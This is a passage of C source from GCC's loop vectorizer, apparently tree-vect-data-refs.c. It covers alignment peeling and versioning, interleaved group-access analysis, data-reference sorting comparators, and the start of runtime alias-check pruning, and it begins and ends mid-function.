LOOP_VINFO_PEELING_FOR_ALIGNMENT (loop_vinfo) = npeel;
else
LOOP_VINFO_PEELING_FOR_ALIGNMENT (loop_vinfo)
= DR_MISALIGNMENT (dr0);
SET_DR_MISALIGNMENT (dr0, 0);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Alignment of access forced using peeling.\n");
dump_printf_loc (MSG_NOTE, vect_location,
"Peeling for alignment will be applied.\n");
}
/* The inside-loop cost will be accounted for in vectorizable_load
and vectorizable_store correctly with adjusted alignments.
Drop the body_cost_vec on the floor here. */
body_cost_vec.release ();
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
gcc_assert (stat);
return stat;
}
}
body_cost_vec.release ();
/* (2) Versioning to force alignment. */
/* Try versioning if:
1) optimize loop for speed
2) there is at least one unsupported misaligned data ref with an unknown
misalignment, and
3) all misaligned data refs with a known misalignment are supported, and
4) the number of runtime alignment checks is within reason. */
do_versioning =
optimize_loop_nest_for_speed_p (loop)
&& (!loop->inner); /* FORNOW */
if (do_versioning)
{
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* For interleaving, only the alignment of the first access
matters. */
if (aligned_access_p (dr)
|| (STMT_VINFO_GROUPED_ACCESS (stmt_info)
&& GROUP_FIRST_ELEMENT (stmt_info) != stmt))
continue;
/* Strided loads perform only component accesses; alignment is
irrelevant for them. */
if (STMT_VINFO_STRIDE_LOAD_P (stmt_info))
continue;
supportable_dr_alignment = vect_supportable_dr_alignment (dr, false);
if (!supportable_dr_alignment)
{
gimple stmt;
int mask;
tree vectype;
if (known_alignment_for_access_p (dr)
|| LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).length ()
>= (unsigned) PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIGNMENT_CHECKS))
{
do_versioning = false;
break;
}
stmt = DR_STMT (dr);
vectype = STMT_VINFO_VECTYPE (vinfo_for_stmt (stmt));
gcc_assert (vectype);
/* The rightmost bits of an aligned address must be zeros.
Construct the mask needed for this test. For example,
GET_MODE_SIZE for the vector mode V4SI is 16 bytes so the
mask must be 15 = 0xf. */
mask = GET_MODE_SIZE (TYPE_MODE (vectype)) - 1;
/* FORNOW: use the same mask to test all potentially unaligned
references in the loop. The vectorizer currently supports
a single vector size, see the reference to
GET_MODE_NUNITS (TYPE_MODE (vectype)) where the
vectorization factor is computed. */
gcc_assert (!LOOP_VINFO_PTR_MASK (loop_vinfo)
|| LOOP_VINFO_PTR_MASK (loop_vinfo) == mask);
LOOP_VINFO_PTR_MASK (loop_vinfo) = mask;
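/* The versioning guard built later from this mask conceptually tests
((addr_1 | ... | addr_n) & mask) == 0 over the collected addresses,
so a single comparison covers all potentially misaligned
references. */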
LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).safe_push (
DR_STMT (dr));
}
}
/* Versioning requires at least one misaligned data reference. */
if (!LOOP_REQUIRES_VERSIONING_FOR_ALIGNMENT (loop_vinfo))
do_versioning = false;
else if (!do_versioning)
LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo).truncate (0);
}
if (do_versioning)
{
vec<gimple> may_misalign_stmts
= LOOP_VINFO_MAY_MISALIGN_STMTS (loop_vinfo);
gimple stmt;
/* It can now be assumed that the data references in the statements
in LOOP_VINFO_MAY_MISALIGN_STMTS will be aligned in the version
of the loop being vectorized. */
FOR_EACH_VEC_ELT (may_misalign_stmts, i, stmt)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
dr = STMT_VINFO_DATA_REF (stmt_info);
SET_DR_MISALIGNMENT (dr, 0);
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Alignment of access forced using versioning.\n");
}
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Versioning for alignment will be applied.\n");
/* Peeling and versioning can't be done together at this time. */
gcc_assert (! (do_peeling && do_versioning));
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
gcc_assert (stat);
return stat;
}
/* This point is reached if neither peeling nor versioning is being done. */
gcc_assert (! (do_peeling || do_versioning));
stat = vect_verify_datarefs_alignment (loop_vinfo, NULL);
return stat;
}
/* Function vect_find_same_alignment_drs.
Update group and alignment relations according to the chosen
vectorization factor. */
static void
vect_find_same_alignment_drs (struct data_dependence_relation *ddr,
loop_vec_info loop_vinfo)
{
unsigned int i;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
int vectorization_factor = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
struct data_reference *dra = DDR_A (ddr);
struct data_reference *drb = DDR_B (ddr);
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
int dra_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (dra))));
int drb_size = GET_MODE_SIZE (TYPE_MODE (TREE_TYPE (DR_REF (drb))));
lambda_vector dist_v;
unsigned int loop_depth;
if (DDR_ARE_DEPENDENT (ddr) == chrec_known)
return;
if (dra == drb)
return;
if (DDR_ARE_DEPENDENT (ddr) == chrec_dont_know)
return;
/* Loop-based vectorization and known data dependence. */
if (DDR_NUM_DIST_VECTS (ddr) == 0)
return;
/* Data-dependence analysis reports a distance vector of zero
for data-references that overlap only in the first iteration
but have steps of different sign (see PR45764).
So as a sanity check require equal DR_STEP. */
if (!operand_equal_p (DR_STEP (dra), DR_STEP (drb), 0))
return;
loop_depth = index_in_loop_nest (loop->num, DDR_LOOP_NEST (ddr));
FOR_EACH_VEC_ELT (DDR_DIST_VECTS (ddr), i, dist_v)
{
int dist = dist_v[loop_depth];
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"dependence distance = %d.\n", dist);
/* Same loop iteration. */
if (dist == 0
|| (dist % vectorization_factor == 0 && dra_size == drb_size))
{
/* Two references with distance zero have the same alignment. */
STMT_VINFO_SAME_ALIGN_REFS (stmtinfo_a).safe_push (drb);
STMT_VINFO_SAME_ALIGN_REFS (stmtinfo_b).safe_push (dra);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"accesses have the same alignment.\n");
dump_printf (MSG_NOTE,
"dependence distance modulo vf == 0 between ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
}
}
}
/* Function vect_analyze_data_refs_alignment
Analyze the alignment of the data-references in the loop.
Return FALSE if a data reference is found that cannot be vectorized. */
bool
vect_analyze_data_refs_alignment (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_refs_alignment ===\n");
/* Mark groups of data references with same alignment using
data dependence information. */
if (loop_vinfo)
{
vec<ddr_p> ddrs = LOOP_VINFO_DDRS (loop_vinfo);
struct data_dependence_relation *ddr;
unsigned int i;
FOR_EACH_VEC_ELT (ddrs, i, ddr)
vect_find_same_alignment_drs (ddr, loop_vinfo);
}
if (!vect_compute_data_refs_alignment (loop_vinfo, bb_vinfo))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: can't calculate alignment "
"for data ref.\n");
return false;
}
return true;
}
/* Analyze groups of accesses: check that DR belongs to a group of
accesses of legal size, step, etc. Detect gaps, single element
interleaving, and other special cases. Set grouped access info.
Collect groups of strided stores for further use in SLP analysis. */
static bool
vect_analyze_group_access (struct data_reference *dr)
{
tree step = DR_STEP (dr);
tree scalar_type = TREE_TYPE (DR_REF (dr));
HOST_WIDE_INT type_size = TREE_INT_CST_LOW (TYPE_SIZE_UNIT (scalar_type));
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
bb_vec_info bb_vinfo = STMT_VINFO_BB_VINFO (stmt_info);
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
HOST_WIDE_INT groupsize, last_accessed_element = 1;
bool slp_impossible = false;
struct loop *loop = NULL;
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
/* For interleaving, GROUPSIZE is STEP counted in elements, i.e., the
size of the interleaving group (including gaps). */
groupsize = absu_hwi (dr_step) / type_size;
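/* For example: a step of 32 bytes over 4-byte elements gives a
groupsize of 8 elements per iteration, whether or not all 8 are
actually accessed. */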
/* A non-consecutive access is possible only if it is part of an interleaving group. */
if (!GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)))
{
/* Check if this DR is part of an interleaving group, and is a single
element of the group that is accessed in the loop. */
/* Gaps are supported only for loads. STEP must be a multiple of the type
size. The size of the group must be a power of 2. */
if (DR_IS_READ (dr)
&& (dr_step % type_size) == 0
&& groupsize > 0
&& exact_log2 (groupsize) != -1)
{
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = stmt;
GROUP_SIZE (vinfo_for_stmt (stmt)) = groupsize;
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Detected single element interleaving ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dr));
dump_printf (MSG_NOTE, " step ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, step);
dump_printf (MSG_NOTE, "\n");
}
if (loop_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Data access with gaps requires scalar "
"epilogue loop\n");
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Peeling for outer loop is not"
" supported\n");
return false;
}
LOOP_VINFO_PEELING_FOR_GAPS (loop_vinfo) = true;
}
return true;
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not consecutive access ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
{
/* Mark the statement as unvectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
return true;
}
return false;
}
if (GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) == stmt)
{
/* First stmt in the interleaving chain. Check the chain. */
gimple next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (stmt));
struct data_reference *data_ref = dr;
unsigned int count = 1;
tree prev_init = DR_INIT (data_ref);
gimple prev = stmt;
HOST_WIDE_INT diff, gaps = 0;
unsigned HOST_WIDE_INT count_in_bytes;
while (next)
{
/* Skip same data-refs. In case that two or more stmts share
data-ref (supported only for loads), we vectorize only the first
stmt, and the rest get their vectorized loads from the first
one. */
if (!tree_int_cst_compare (DR_INIT (data_ref),
DR_INIT (STMT_VINFO_DATA_REF (
vinfo_for_stmt (next)))))
{
if (DR_IS_WRITE (data_ref))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Two store stmts share the same dr.\n");
return false;
}
/* For loads use the same data-ref load. */
GROUP_SAME_DR_STMT (vinfo_for_stmt (next)) = prev;
prev = next;
next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next));
continue;
}
prev = next;
data_ref = STMT_VINFO_DATA_REF (vinfo_for_stmt (next));
/* All group members have the same STEP by construction. */
gcc_checking_assert (operand_equal_p (DR_STEP (data_ref), step, 0));
/* Check that the distance between two accesses is equal to the type
size. Otherwise, we have gaps. */
diff = (TREE_INT_CST_LOW (DR_INIT (data_ref))
- TREE_INT_CST_LOW (prev_init)) / type_size;
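/* For example: with 4-byte elements, inits of 0 and 8 give diff = 2,
i.e. one element of the group is skipped between the two accesses
(a gap of diff - 1 = 1). */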
if (diff != 1)
{
/* FORNOW: SLP of accesses with gaps is not supported. */
slp_impossible = true;
if (DR_IS_WRITE (data_ref))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaved store with gaps\n");
return false;
}
gaps += diff - 1;
}
last_accessed_element += diff;
/* Store the gap from the previous member of the group. If there is no
gap in the access, GROUP_GAP is always 1. */
GROUP_GAP (vinfo_for_stmt (next)) = diff;
prev_init = DR_INIT (data_ref);
next = GROUP_NEXT_ELEMENT (vinfo_for_stmt (next));
/* Count the number of data-refs in the chain. */
count++;
}
/* COUNT is the number of accesses found, we multiply it by the size of
the type to get COUNT_IN_BYTES. */
count_in_bytes = type_size * count;
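/* For example: 3 accesses of a 4-byte type give count_in_bytes = 12;
with one gap element the interleaving occupies 16 bytes, so the step
must be at least 16 to pass the check below. */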
/* Check that the size of the interleaving (including gaps) is not
greater than STEP. */
if (dr_step != 0
&& absu_hwi (dr_step) < count_in_bytes + gaps * type_size)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaving size is greater than step for ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
DR_REF (dr));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
/* Check that the size of the interleaving is equal to STEP for stores,
i.e., that there are no gaps. */
if (dr_step != 0
&& absu_hwi (dr_step) != count_in_bytes)
{
if (DR_IS_READ (dr))
{
slp_impossible = true;
/* There is a gap after the last load in the group. This gap is the
difference between the groupsize and the number of elements.
When there is no gap, this difference should be 0. */
GROUP_GAP (vinfo_for_stmt (stmt)) = groupsize - count;
}
else
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"interleaved store with gaps\n");
return false;
}
}
/* Check that STEP is a multiple of type size. */
if (dr_step != 0
&& (dr_step % type_size) != 0)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"step is not a multiple of type size: step ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM, step);
dump_printf (MSG_MISSED_OPTIMIZATION, " size ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_SLIM,
TYPE_SIZE_UNIT (scalar_type));
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
if (groupsize == 0)
groupsize = count;
GROUP_SIZE (vinfo_for_stmt (stmt)) = groupsize;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"Detected interleaving of size %d\n", (int)groupsize);
/* SLP: create an SLP data structure for every interleaving group of
stores for further analysis in vect_analyze_slp. */
if (DR_IS_WRITE (dr) && !slp_impossible)
{
if (loop_vinfo)
LOOP_VINFO_GROUPED_STORES (loop_vinfo).safe_push (stmt);
if (bb_vinfo)
BB_VINFO_GROUPED_STORES (bb_vinfo).safe_push (stmt);
}
/* There is a gap at the end of the group. */
if (groupsize - last_accessed_element > 0 && loop_vinfo)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Data access with gaps requires scalar "
"epilogue loop\n");
if (loop->inner)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"Peeling for outer loop is not supported\n");
return false;
}
LOOP_VINFO_PEELING_FOR_GAPS (loop_vinfo) = true;
}
}
return true;
}
/* Analyze the access pattern of the data-reference DR.
In case of non-consecutive accesses call vect_analyze_group_access() to
analyze groups of accesses. */
static bool
vect_analyze_data_ref_access (struct data_reference *dr)
{
tree step = DR_STEP (dr);
tree scalar_type = TREE_TYPE (DR_REF (dr));
gimple stmt = DR_STMT (dr);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
if (loop_vinfo)
loop = LOOP_VINFO_LOOP (loop_vinfo);
if (loop_vinfo && !step)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"bad data-ref access in loop\n");
return false;
}
/* Allow invariant loads in non-nested loops. */
if (loop_vinfo && integer_zerop (step))
{
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
if (nested_in_vect_loop_p (loop, stmt))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"zero step in inner loop of nest\n");
return false;
}
return DR_IS_READ (dr);
}
if (loop && nested_in_vect_loop_p (loop, stmt))
{
/* Interleaved accesses are not yet supported within outer-loop
vectorization for references in the inner-loop. */
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
/* For the rest of the analysis we use the outer-loop step. */
step = STMT_VINFO_DR_STEP (stmt_info);
if (integer_zerop (step))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"zero step in outer loop.\n");
if (DR_IS_READ (dr))
return true;
else
return false;
}
}
/* Consecutive? */
if (TREE_CODE (step) == INTEGER_CST)
{
HOST_WIDE_INT dr_step = TREE_INT_CST_LOW (step);
if (!tree_int_cst_compare (step, TYPE_SIZE_UNIT (scalar_type))
|| (dr_step < 0
&& !compare_tree_int (TYPE_SIZE_UNIT (scalar_type), -dr_step)))
{
/* Mark that it is not interleaving. */
GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt)) = NULL;
return true;
}
}
if (loop && nested_in_vect_loop_p (loop, stmt))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"grouped access in outer loop.\n");
return false;
}
/* Assume this is a DR handled by the non-constant strided load case. */
if (TREE_CODE (step) != INTEGER_CST)
return STMT_VINFO_STRIDE_LOAD_P (stmt_info);
/* Not consecutive access - check if it's a part of interleaving group. */
return vect_analyze_group_access (dr);
}
/* A helper function used in the comparator function to sort data
references. T1 and T2 are two data references to be compared.
The function returns -1, 0, or 1. */
static int
compare_tree (tree t1, tree t2)
{
int i, cmp;
enum tree_code code;
char tclass;
if (t1 == t2)
return 0;
if (t1 == NULL)
return -1;
if (t2 == NULL)
return 1;
if (TREE_CODE (t1) != TREE_CODE (t2))
return TREE_CODE (t1) < TREE_CODE (t2) ? -1 : 1;
code = TREE_CODE (t1);
switch (code)
{
/* For const values, we can just use hash values for comparisons. */
case INTEGER_CST:
case REAL_CST:
case FIXED_CST:
case STRING_CST:
case COMPLEX_CST:
case VECTOR_CST:
{
hashval_t h1 = iterative_hash_expr (t1, 0);
hashval_t h2 = iterative_hash_expr (t2, 0);
if (h1 != h2)
return h1 < h2 ? -1 : 1;
break;
}
case SSA_NAME:
cmp = compare_tree (SSA_NAME_VAR (t1), SSA_NAME_VAR (t2));
if (cmp != 0)
return cmp;
if (SSA_NAME_VERSION (t1) != SSA_NAME_VERSION (t2))
return SSA_NAME_VERSION (t1) < SSA_NAME_VERSION (t2) ? -1 : 1;
break;
default:
tclass = TREE_CODE_CLASS (code);
/* For var-decl, we could compare their UIDs. */
if (tclass == tcc_declaration)
{
if (DECL_UID (t1) != DECL_UID (t2))
return DECL_UID (t1) < DECL_UID (t2) ? -1 : 1;
break;
}
/* For expressions with operands, compare their operands recursively. */
for (i = TREE_OPERAND_LENGTH (t1) - 1; i >= 0; --i)
{
cmp = compare_tree (TREE_OPERAND (t1, i), TREE_OPERAND (t2, i));
if (cmp != 0)
return cmp;
}
}
return 0;
}
/* Compare two data-references DRA and DRB to sort them into chunks
suitable for grouping. */
static int
dr_group_sort_cmp (const void *dra_, const void *drb_)
{
data_reference_p dra = *(data_reference_p *)const_cast<void *>(dra_);
data_reference_p drb = *(data_reference_p *)const_cast<void *>(drb_);
int cmp;
/* Stabilize sort. */
if (dra == drb)
return 0;
/* Ordering of DRs according to base. */
if (!operand_equal_p (DR_BASE_ADDRESS (dra), DR_BASE_ADDRESS (drb), 0))
{
cmp = compare_tree (DR_BASE_ADDRESS (dra), DR_BASE_ADDRESS (drb));
if (cmp != 0)
return cmp;
}
/* And according to DR_OFFSET. */
if (!dr_equal_offsets_p (dra, drb))
{
cmp = compare_tree (DR_OFFSET (dra), DR_OFFSET (drb));
if (cmp != 0)
return cmp;
}
/* Put reads before writes. */
if (DR_IS_READ (dra) != DR_IS_READ (drb))
return DR_IS_READ (dra) ? -1 : 1;
/* Then sort by access size. */
if (!operand_equal_p (TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra))),
TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb))), 0))
{
cmp = compare_tree (TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra))),
TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb))));
if (cmp != 0)
return cmp;
}
/* And by step. */
if (!operand_equal_p (DR_STEP (dra), DR_STEP (drb), 0))
{
cmp = compare_tree (DR_STEP (dra), DR_STEP (drb));
if (cmp != 0)
return cmp;
}
/* Then sort by DR_INIT. In case of identical DRs sort by stmt UID. */
cmp = tree_int_cst_compare (DR_INIT (dra), DR_INIT (drb));
if (cmp == 0)
return gimple_uid (DR_STMT (dra)) < gimple_uid (DR_STMT (drb)) ? -1 : 1;
return cmp;
}
/* Function vect_analyze_data_ref_accesses.
Analyze the access pattern of all the data references in the loop.
FORNOW: the only access pattern that is considered vectorizable is a
simple step 1 (consecutive) access.
FORNOW: handle only arrays and pointer accesses. */
bool
vect_analyze_data_ref_accesses (loop_vec_info loop_vinfo, bb_vec_info bb_vinfo)
{
unsigned int i;
vec<data_reference_p> datarefs;
struct data_reference *dr;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_ref_accesses ===\n");
if (loop_vinfo)
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
else
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
if (datarefs.is_empty ())
return true;
/* Sort the array of datarefs to make building the interleaving chains
linear. Don't modify the original vector's order; it is needed for
determining what dependencies are reversed. */
vec<data_reference_p> datarefs_copy = datarefs.copy ();
datarefs_copy.qsort (dr_group_sort_cmp);
/* Build the interleaving chains. */
for (i = 0; i < datarefs_copy.length () - 1;)
{
data_reference_p dra = datarefs_copy[i];
stmt_vec_info stmtinfo_a = vinfo_for_stmt (DR_STMT (dra));
stmt_vec_info lastinfo = NULL;
for (i = i + 1; i < datarefs_copy.length (); ++i)
{
data_reference_p drb = datarefs_copy[i];
stmt_vec_info stmtinfo_b = vinfo_for_stmt (DR_STMT (drb));
/* ??? Imperfect sorting (non-compatible types, non-modulo
accesses, same accesses) can lead to a group being artificially
split here as we don't just skip over those. If it really
matters we can push those to a worklist and re-iterate
over them. Then we can just skip ahead to the next DR here. */
/* Check that the data-refs have same first location (except init)
and they are both either store or load (not load and store,
not masked loads or stores). */
if (DR_IS_READ (dra) != DR_IS_READ (drb)
|| !operand_equal_p (DR_BASE_ADDRESS (dra),
DR_BASE_ADDRESS (drb), 0)
|| !dr_equal_offsets_p (dra, drb)
|| !gimple_assign_single_p (DR_STMT (dra))
|| !gimple_assign_single_p (DR_STMT (drb)))
break;
/* Check that the data-refs have the same constant size and step. */
tree sza = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dra)));
tree szb = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (drb)));
if (!tree_fits_uhwi_p (sza)
|| !tree_fits_uhwi_p (szb)
|| !tree_int_cst_equal (sza, szb)
|| !tree_fits_shwi_p (DR_STEP (dra))
|| !tree_fits_shwi_p (DR_STEP (drb))
|| !tree_int_cst_equal (DR_STEP (dra), DR_STEP (drb)))
break;
/* Do not place the same access in the interleaving chain twice. */
if (tree_int_cst_compare (DR_INIT (dra), DR_INIT (drb)) == 0)
break;
/* Check the types are compatible.
??? We don't distinguish this during sorting. */
if (!types_compatible_p (TREE_TYPE (DR_REF (dra)),
TREE_TYPE (DR_REF (drb))))
break;
/* Sorting has ensured that DR_INIT (dra) <= DR_INIT (drb). */
HOST_WIDE_INT init_a = TREE_INT_CST_LOW (DR_INIT (dra));
HOST_WIDE_INT init_b = TREE_INT_CST_LOW (DR_INIT (drb));
gcc_assert (init_a < init_b);
/* If init_b == init_a + the size of the type * k, we have an
interleaving, and DRA is accessed before DRB. */
HOST_WIDE_INT type_size_a = tree_to_uhwi (sza);
if ((init_b - init_a) % type_size_a != 0)
break;
/* If the step (if not zero) is not greater than the difference
between the data-refs' inits, DRB starts a new group. This
splits groups into suitable sizes. */
HOST_WIDE_INT step = tree_to_shwi (DR_STEP (dra));
if (step != 0 && step <= (init_b - init_a))
break;
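/* For example: with 4-byte elements and a step of 16, accesses with
inits 0, 4, 8 and 12 form one group; an access with init 16 starts a
new group because 16 - 0 >= step. */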
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"Detected interleaving ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (dra));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, DR_REF (drb));
dump_printf (MSG_NOTE, "\n");
}
/* Link the found element into the group list. */
if (!GROUP_FIRST_ELEMENT (stmtinfo_a))
{
GROUP_FIRST_ELEMENT (stmtinfo_a) = DR_STMT (dra);
lastinfo = stmtinfo_a;
}
GROUP_FIRST_ELEMENT (stmtinfo_b) = DR_STMT (dra);
GROUP_NEXT_ELEMENT (lastinfo) = DR_STMT (drb);
lastinfo = stmtinfo_b;
}
}
FOR_EACH_VEC_ELT (datarefs_copy, i, dr)
if (STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr)))
&& !vect_analyze_data_ref_access (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: complicated access pattern.\n");
if (bb_vinfo)
{
/* Mark the statement as not vectorizable. */
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
continue;
}
else
{
datarefs_copy.release ();
return false;
}
}
datarefs_copy.release ();
return true;
}
/* Operator == between two dr_with_seg_len objects.
This equality operator is used to make sure two data refs
are the same so that we will consider combining the
aliasing checks of those two pairs of data-dependent data
refs. */
static bool
operator == (const dr_with_seg_len& d1,
const dr_with_seg_len& d2)
{
return operand_equal_p (DR_BASE_ADDRESS (d1.dr),
DR_BASE_ADDRESS (d2.dr), 0)
&& compare_tree (d1.offset, d2.offset) == 0
&& compare_tree (d1.seg_len, d2.seg_len) == 0;
}
/* Function comp_dr_with_seg_len_pair.
Comparison function for sorting objects of dr_with_seg_len_pair_t
so that we can combine aliasing checks in one scan. */
static int
comp_dr_with_seg_len_pair (const void *p1_, const void *p2_)
{
const dr_with_seg_len_pair_t* p1 = (const dr_with_seg_len_pair_t *) p1_;
const dr_with_seg_len_pair_t* p2 = (const dr_with_seg_len_pair_t *) p2_;
const dr_with_seg_len &p11 = p1->first,
&p12 = p1->second,
&p21 = p2->first,
&p22 = p2->second;
/* For DR pairs (a, b) and (c, d), we only consider merging the alias checks
if a and c have the same base address and step, and b and d have the same
base address and step. Therefore, if either a&c or b&d don't have the same
address and step, we don't care about the order of those two pairs after
sorting. */
int comp_res;
if ((comp_res = compare_tree (DR_BASE_ADDRESS (p11.dr),
DR_BASE_ADDRESS (p21.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_BASE_ADDRESS (p12.dr),
DR_BASE_ADDRESS (p22.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_STEP (p11.dr), DR_STEP (p21.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (DR_STEP (p12.dr), DR_STEP (p22.dr))) != 0)
return comp_res;
if ((comp_res = compare_tree (p11.offset, p21.offset)) != 0)
return comp_res;
if ((comp_res = compare_tree (p12.offset, p22.offset)) != 0)
return comp_res;
return 0;
}
/* Function vect_vfa_segment_size.
Create an expression that computes the size of the segment
that will be accessed for a data reference. The function takes into
account that realignment loads may access one more vector.
Input:
DR: The data reference.
LENGTH_FACTOR: segment length to consider.
Return an expression whose value is the size of segment which will be
accessed by DR. */
static tree
vect_vfa_segment_size (struct data_reference *dr, tree length_factor)
{
tree segment_length;
if (integer_zerop (DR_STEP (dr)))
segment_length = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dr)));
else
segment_length = size_binop (MULT_EXPR,
fold_convert (sizetype, DR_STEP (dr)),
fold_convert (sizetype, length_factor));
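/* For example: a unit-stride 4-byte access with LENGTH_FACTOR equal
to a vectorization factor of 4 yields a 16-byte segment. */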
if (vect_supportable_dr_alignment (dr, false)
== dr_explicit_realign_optimized)
{
tree vector_size = TYPE_SIZE_UNIT
(STMT_VINFO_VECTYPE (vinfo_for_stmt (DR_STMT (dr))));
segment_length = size_binop (PLUS_EXPR, segment_length, vector_size);
}
return segment_length;
}
/* Function vect_prune_runtime_alias_test_list.
Prune a list of ddrs to be tested at run-time by versioning for alias.
Merge several alias checks into one if possible.
Return FALSE if the resulting list of ddrs is longer than allowed by
PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS, otherwise return TRUE. */
bool
vect_prune_runtime_alias_test_list (loop_vec_info loop_vinfo)
{
vec<ddr_p> may_alias_ddrs =
LOOP_VINFO_MAY_ALIAS_DDRS (loop_vinfo);
vec<dr_with_seg_len_pair_t>& comp_alias_ddrs =
LOOP_VINFO_COMP_ALIAS_DDRS (loop_vinfo);
int vect_factor = LOOP_VINFO_VECT_FACTOR (loop_vinfo);
tree scalar_loop_iters = LOOP_VINFO_NITERS (loop_vinfo);
ddr_p ddr;
unsigned int i;
tree length_factor;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_prune_runtime_alias_test_list ===\n");
if (may_alias_ddrs.is_empty ())
return true;
/* Basically, for each pair of dependent data refs store_ptr_0
and load_ptr_0, we create an expression:
